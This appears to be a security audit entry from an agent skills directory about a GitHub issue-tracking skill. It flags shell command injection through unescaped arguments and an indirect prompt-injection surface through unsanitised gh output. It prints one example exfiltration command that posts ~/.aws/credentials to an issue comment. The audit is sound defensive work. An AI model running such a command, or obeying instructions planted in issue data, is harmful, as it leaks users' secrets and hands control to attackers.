The Agent Skills Directory

[COMMAND_EXECUTION]: The skill directly interpolates user-provided input from $ARGUMENTS[0] into shell commands in SKILL.md and rules/start-work-ceremony.md. Examples include gh issue edit $ARGUMENTS[0], gh issue comment $ARGUMENTS[0], and git checkout -b issue/$ARGUMENTS[0]-.... If the input contains shell metacharacters (e.g., ;, &&, |), it allows for arbitrary command execution within the agent's environment.
[DATA_EXFILTRATION]: The command injection vulnerability can be leveraged to exfiltrate sensitive data. An attacker could provide a malicious argument that executes a command like gh issue comment 123 --body "$(cat ~/.aws/credentials)", sending local secrets to an external GitHub issue.
[PROMPT_INJECTION]: The skill exhibits a vulnerability surface for indirect prompt injection (Category 8).
Ingestion points: Untrusted data enters the agent context through the output of gh CLI commands when reading issue status or comments as part of the ceremony instructions in SKILL.md.
Boundary markers: No delimiters or instructions are used to distinguish between legitimate issue data and potentially malicious embedded instructions.
Capability inventory: The skill has access to the Bash tool, enabling it to execute git commands, modify files, and interact with the GitHub API.
Sanitization: There is no validation or escaping of the data retrieved from GitHub before it is processed or acted upon by the agent.

issue-progress-tracking